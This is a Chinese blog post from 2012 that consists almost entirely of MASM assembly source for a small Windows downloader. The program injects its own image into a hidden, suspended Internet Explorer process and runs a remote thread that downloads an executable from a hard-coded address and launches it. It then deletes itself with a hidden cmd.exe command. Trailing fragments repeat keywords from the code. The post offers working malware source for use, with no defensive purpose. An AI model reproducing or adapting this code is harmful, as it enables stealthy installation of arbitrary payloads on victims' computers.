加载中…无DLL,插IE下载者 3.5K
(2012-05-18 12:13:27)
标签:
杂谈 |
分类: 技术文章 |
.386
.modelflat,stdcall
optioncasemap:none
includewindows.inc
includeurlmon.inc
includeuser32.inc
includekernel32.inc
includelibuser32.lib
includeliburlmon.lib
includelibkernel32.lib
Downloadproto
.data
szUrlmon db "urlmon.dll",0
szURL db " http://192.168.1.5/123.exe",24 dup (0)
szFile db "c:\test.exe",39 dup (0)
szCmdline db "c:\program files\internet explorer\iexplore.exe",0
szAdddb '\cmd.exe /c del "',0
quotedb '"',0
.data?
cbSizeDWORD ?
cdWrittenDWORD ?
pidDWORD ?
hProcessDWORD ?
hModuleDWORD ?
hThreadDWORD ?
startupinfoSTARTUPINFO <?>
piPROCESS_INFORMATION <>
SelfPathdb MAX_PATH dup (?)
szCmddb MAX_PATH dup (?)
.code
start:
invoke GetModuleHandle,0
mov hModule,eax
mov edi,eax
assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew
add edi,sizeof DWORD
assume edi:ptr IMAGE_FILE_HEADER
add edi,sizeof IMAGE_FILE_HEADER
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,[edi].SizeOfImage
mov cbSize,eax
lea esi,offset startupinfo
assume esi:ptr STARTUPINFO
mov [esi].cb,sizeof STARTUPINFO
invoke GetStartupInfo,offset startupinfo
mov [esi].wShowWindow,SW_HIDE
mov [esi].dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
invoke createProcess,offset
szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offsetstartupinfo,offset pi
lea esi,offset pi
assume esi:ptr PROCESS_INFORMATION
mov eax,[esi].dwProcessId
mov pid,eax
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid
mov hProcess,eax
invoke VirtualAllocEx,hProcess,hModule,cbSize,MEM_COMMIT or
MEM_RESERVE,PAGE_EXECUTE_READWRITE
invoke WriteProcessMemory,hProcess,eax,hModule,cbSize,offset cdWritten
invoke createRemoteThread,hProcess,0,0,addr Download,hModule,0,ebx
mov hThread,eax
invoke WaitForSingleObject,hThread,INFINITE
invoke CloseHandle,hThread
invoke CloseHandle,hProcess
deleteSelf:
invoke GetModuleFileName,NULL,offset SelfPath,MAX_PATH
invoke GetSystemDirectory,offset szCmd,MAX_PATH
invoke lstrcat,offset szCmd,offset szAdd
invoke lstrcat,offset szCmd,offset SelfPath
invoke lstrcat,offset szCmd,offset quote
invoke Sleep,200
invoke WinExec,offset szCmd,SW_HIDE
invoke ExitProcess,0
Downloadproc
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,offset szURL,offset szFile,0,NULL
invoke WinExec,offset szFile,SW_SHOW
invoke ExitThread,0
Downloadendp
endstart
.model
option
include
include
include
include
includelib
includelib
includelib
Download
.data
szUrlmon
szURL
szFile
szCmdline
szAdd
quote
.data?
cbSize
cdWritten
pid
hProcess
hModule
hThread
startupinfo
pi
SelfPath
szCmd
.code
start:
szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offset
MEM_RESERVE,PAGE_EXECUTE_READWRITE
deleteSelf:
Download
Download
end
喜欢
0
赠金笔